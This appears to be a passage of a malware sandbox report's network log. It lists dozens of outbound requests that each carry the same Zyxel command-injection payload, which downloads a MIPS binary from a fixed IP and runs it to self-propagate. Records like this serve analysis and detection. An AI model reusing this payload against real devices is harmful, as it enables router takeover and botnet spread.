                                            Jan 14, 2024 15:50:44.515049934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5839192.168.2.234560247.183.237.204443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.515069962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5840192.168.2.234959676.251.93.47443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.515100956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5841192.168.2.233349673.46.59.204443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.515137911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5842192.168.2.2340906134.102.178.184443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.515170097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5843192.168.2.233765481.114.172.54443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.515207052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5844192.168.2.2336106178.224.0.131443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.515223980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5845192.168.2.2360636208.35.76.125443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.515239954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5846192.168.2.2346832177.38.89.94443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.515281916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5847192.168.2.2334942178.65.235.3443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.515322924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5848192.168.2.2337390165.111.12.234443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.515355110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5849192.168.2.233958457.141.7.211443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.515372992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5850192.168.2.2344986107.21.222.146443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.515420914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5851192.168.2.2351334106.135.52.246443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.515453100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5852192.168.2.23488365.58.131.51443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.515477896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5853192.168.2.2344248161.134.165.31443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.515522003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5854192.168.2.2350456165.152.2.150443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.515531063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5855192.168.2.233600658.173.154.220443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.515559912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5856192.168.2.2351158145.66.97.213443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.515583038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5857192.168.2.2335320119.103.193.215443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.515620947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5858192.168.2.2339800119.211.165.208443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.515672922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5859192.168.2.233800238.152.65.191443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.519131899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5860192.168.2.2344252119.216.163.26443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.519162893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5861192.168.2.234274260.194.176.5443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.519180059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5862192.168.2.235457661.128.248.251443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.519215107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5863192.168.2.2349922140.156.95.67443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.519248962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5864192.168.2.2359792135.102.119.244443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.519306898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5865192.168.2.2345380198.106.16.97443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.519334078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5866192.168.2.234054895.64.79.215443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.519391060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5867192.168.2.233795459.66.21.138443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.519433022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5868192.168.2.2360828120.139.101.193443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.519454956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5869192.168.2.2339326153.250.129.185443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.519484043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5870192.168.2.235286425.39.250.131443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.519505024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5871192.168.2.2351428124.85.220.177443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.519553900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5872192.168.2.23609901.218.255.2443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.519567013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5873192.168.2.2349874106.161.183.166443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.519587994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5874192.168.2.2358362217.164.44.210443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.519634008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5875192.168.2.2342986181.118.42.149443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.519659042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5876192.168.2.2359606126.1.84.4443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.519680977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5877192.168.2.2348234222.6.165.235443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.519721985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5878192.168.2.2343538186.179.121.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:44.519742966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5879192.168.2.2356550166.132.91.144443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.537566900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5880192.168.2.234734078.156.125.13443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.537610054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5881192.168.2.2341514108.41.127.1443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.537614107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5882192.168.2.2352990112.21.235.93443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.537822962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5883192.168.2.2352678112.43.195.168443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.537863970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5884192.168.2.234858450.227.27.170443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.537873030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5885192.168.2.233802627.46.192.12443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.537893057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5886192.168.2.234952690.247.74.181443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.537923098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5887192.168.2.2346540168.45.110.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.537983894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5888192.168.2.2358472218.166.249.95443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.538008928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5889192.168.2.233432245.6.18.80443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.538044930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5890192.168.2.234183840.188.93.114443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.538054943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5891192.168.2.234672664.184.113.20443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.538081884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5892192.168.2.2358070150.100.70.148443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.538134098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5893192.168.2.234872846.28.181.145443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.538161039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5894192.168.2.2345448117.86.212.89443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.538175106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5895192.168.2.2333216153.168.184.214443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.538208008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5896192.168.2.234765691.66.131.151443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.538237095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5897192.168.2.235521471.175.216.183443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.538258076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5898192.168.2.234526887.232.16.102443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.538289070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5899192.168.2.233994032.53.211.112443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.538338900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5900192.168.2.2342632185.194.189.47443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.538373947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5901192.168.2.234450095.53.218.197443
                                            TimestampBytes transferredDirectionData
